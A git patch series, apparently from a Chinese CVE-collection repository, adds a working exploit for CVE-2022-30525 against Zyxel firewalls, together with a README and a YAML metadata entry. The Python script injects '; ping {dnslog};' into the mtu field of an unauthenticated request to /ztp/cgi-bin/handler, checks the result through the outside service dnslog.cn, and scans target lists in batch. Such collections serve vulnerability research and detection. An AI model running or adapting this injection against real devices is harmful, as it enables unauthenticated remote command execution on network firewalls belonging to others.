From 741c8ac531144b75de151ca21a13e752ae401ec3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9C=88=E4=BA=AE=E5=92=8C=E5=A4=AA=E9=98=B3?= Date: Thu, 6 Apr 2023 09:24:49 +0800 Subject: [PATCH 1/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-30525?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2022/CVE-2022-30525/CVE-2022-30525.yaml | 116 ++++++++++++++++++ cve/Zyxel/2022/CVE-2022-30525/README.md | 32 +++++ cve/Zyxel/yaml/CVE-2022-30525.yaml | 21 ++++ other_list.yaml | 2 + 4 files changed, 171 insertions(+) create mode 100644 cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml create mode 100644 cve/Zyxel/2022/CVE-2022-30525/README.md create mode 100644 cve/Zyxel/yaml/CVE-2022-30525.yaml diff --git a/cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml b/cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml new file mode 100644 index 00000000..3d181373 --- /dev/null +++ b/cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml 
@@ -0,0 +1,116 @@ +#!/usr/bin/env python +# -*- conding:utf-8 -*- +import requests +import argparse +import sys +import urllib3 +import json +import time +import random +import signal + +dnslog_res = requests.session() +urllib3.disable_warnings() + +__desc__ = 'CVE-2022-30525利用dnslog批量验证' +__author__ = 'savior' +__date__ = '2022/05/14' +__version__ = 'v0.1' +__link__ = 'https://github.com/savior-only/CVE-2022-30525' + + +def banner(): + print(""" + ██████ ██ ██ ████████ ████ ████ ████ ████ ████ ████ ██████ ████ ██████ + ██░░░░██░██ ░██░██░░░░░ █░░░ █ █░░░██ █░░░ █ █░░░ █ █░░░ █ █░░░██░█░░░░ █░░░ █░█░░░░ + ██ ░░ ░██ ░██░██ ░ ░█░█ █░█░ ░█░ ░█ ░ ░█░█ █░█░█████ ░ ░█░█████ +░██ ░░██ ██ ░███████ █████ ███ ░█ █ ░█ ███ ███ █████ ███ ░█ █ ░█░░░░░ █ ███ ░░░░░ █ +░██ ░░██ ██ ░██░░░░ ░░░░░ █░░ ░██ ░█ █░░ █░░ ░░░░░ ░░░ █░██ ░█ ░█ █░░ ░█ +░░██ ██ ░░████ ░██ █ ░█ ░█ █ █ █ ░█░█ ░█ █ ░█ █ █ ░█ + ░░██████ ░░██ ░████████ ░██████░ ████ ░██████░██████ ░ ████ ░ ████ ░ ████ ░██████░ ████ + ░░░░░░ ░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░░ ░░░░░░ ░░░░ ░░░░ ░░░░ ░░░░░░ ░░░░ + + + by {} {} + {} + """.format(__author__, __version__, __link__)) + + +class Dnslog: + + def get_dnslog(): + t = random.random() + url = f"http://www.dnslog.cn/getdomain.php?t={t}" + res1 = dnslog_res.get(url=url, proxies=proxies) + if res1.status_code == 200 and "dnslog" in res1.text: + dnslog = res1.text + return dnslog + else: + print("获取dnslog失败") + + + def get_data(): + t = random.random() + url = f"http://www.dnslog.cn/getrecords.php?t={t}" + res2 = dnslog_res.get(url=url, proxies=proxies) + return res2.text + +class information(object): + + def __init__(self,args): + self.args = args + self.url = args.url + self.file = args.file + + def target_url(self): + target_url = self.url + "/ztp/cgi-bin/handler" + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0", + "Content-Type": "application/json" + } + dnslog = Dnslog.get_dnslog() + data = {"command": 
"setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f"; ping {dnslog};", "data": "hi"} + try: + res = requests.post(url=target_url, headers=headers, data=json.dumps(data), verify=False, proxies=proxies, timeout=5) + except Exception as e: + pass + + time.sleep(5) + data = Dnslog.get_data() + if dnslog in data: + print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Zyxel 防火墙未经身份验证的远程命令注入\033[0m") + print("[" + "-"*100 + "]") + else: + print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在Zyxel 防火墙未经身份验证的远程命令注入!") + print("[" + "-"*100 + "]") + + def file_url(self): + with open(self.file, "r") as urls: + for url in urls: + url = url.strip() + if url[:4] != "http": + url = "http://" + url + self.url = url.strip() + information.target_url(self) + + +if __name__ == "__main__": + try: + banner() + parser = argparse.ArgumentParser(description='Zyxel 防火墙未经身份验证的远程命令注入', add_help=False) + parser.add_argument("-h", "--help", action="help", help="Show this help message and exit") + parser.add_argument("-u", "--url", type=str, dest="url", help="Target url eg:\"http://127.0.0.1\"") + parser.add_argument("-f", "--file", dest="file", help="Targets in file eg:\"url.txt\"") + parser.add_argument("-proxy", dest="proxy", help="Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)") + args = parser.parse_args() + if args.proxy: + proxies = {"http": args.proxy, "https": args.proxy} + print("\033[31m[+] use proxy: {}\033[0m".format(args.proxy)) + if args.url: + information(args).target_url() + elif args.file: + information(args).file_url() + #检测ctrl+c + except KeyboardInterrupt: + print("\n\033[31mYou choose to stop me.\033[0m") + diff --git a/cve/Zyxel/2022/CVE-2022-30525/README.md b/cve/Zyxel/2022/CVE-2022-30525/README.md new file mode 100644 index 00000000..e811e51e --- /dev/null +++ b/cve/Zyxel/2022/CVE-2022-30525/README.md 
@@ -0,0 +1,32 @@
+# CVE-2022-30525
+Zyxel 防火墙未经身份验证的远程命令注入
+
+## 影响版本
+
+### 影响组件
+
+USG FLEX 100, 100W, 200, 500, 700
+USG20-VPN, USG20W-VPN
+ATP 100, 200, 500, 700, 800
+
+### 固件版本
+
+ZLD5.00 thru ZLD5.21 Patch 1
+ZLD5.10 thru ZLD5.21 Patch 1
+ZLD5.10 thru ZLD5.21 Patch 1
+
+## update
+
+-proxy
+
+
+
+## From
+https://github.com/Henry4E36/CVE-2022-30525
+
+
+# ⚠️ 免责声明
+
+此工具仅作为网络安全攻防研究交流,请使用者遵照网络安全法合理使用! 如果使用者使用该工具出现非法攻击等违法行为,与本作者无关!
+
+
diff --git a/cve/Zyxel/yaml/CVE-2022-30525.yaml b/cve/Zyxel/yaml/CVE-2022-30525.yaml
new file mode 100644
index 00000000..0f01d728
--- /dev/null
+++ b/cve/Zyxel/yaml/CVE-2022-30525.yaml
@@ -0,0 +1,21 @@
+id: CVE-2022-30525
+source: https://github.com/savior-only/CVE-2022-30525
+info:
+ name: Zyxel 防火墙未经身份验证的远程命令注入。
+ severity: critical
+ description:
+ A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
+ scope-of-influence:
+ firmware versions 5.00 ~ 5.21
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2022-30525
+ - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-30525
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-30525
+ cwe-id: CWE-78
+ cnvd-id: None
+ kve-id: None
+ tags: cve2022, Vendor Advisory, VDB Entry, firmware
+
diff --git a/other_list.yaml b/other_list.yaml
index 363ec2fb..fc7663c8 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -43,4 +43,6 @@ cve: - CVE-2021-21315 zabbix: - CVE-2022-23131 + Zyxel: + - CVE-2022-30525 cnvd: -- Gitee From 6e256bd2a49b374f98f066262556301e9da9a09a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9C=88=E4=BA=AE=E5=92=8C=E5=A4=AA=E9=98=B3?= Date: Thu, 6 Apr 2023 14:46:10 +0800 Subject: [PATCH 2/3] =?UTF-8?q?=E4=BF=AE=E6=94=B9yaml=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E4=BD=8D=E7=BD=AE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Zyxel/{ => 2022}/yaml/CVE-2022-30525.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/Zyxel/{ => 2022}/yaml/CVE-2022-30525.yaml (100%) diff --git a/cve/Zyxel/yaml/CVE-2022-30525.yaml b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml similarity index 100% rename from cve/Zyxel/yaml/CVE-2022-30525.yaml rename to cve/Zyxel/2022/yaml/CVE-2022-30525.yaml -- Gitee From f42851dbb8478d335cee2abe526bbfcd87ab765a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9C=88=E4=BA=AE=E5=92=8C=E5=A4=AA=E9=98=B3?= Date: Thu, 6 Apr 2023 15:05:24 +0800 Subject: [PATCH 3/3] rename filename --- .../CVE-2022-30525/{CVE-2022-30525.yaml => CVE-2022-30525.py} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/Zyxel/2022/CVE-2022-30525/{CVE-2022-30525.yaml => CVE-2022-30525.py} (100%) diff --git a/cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml b/cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.py similarity index 100% rename from cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml rename to cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.py -- Gitee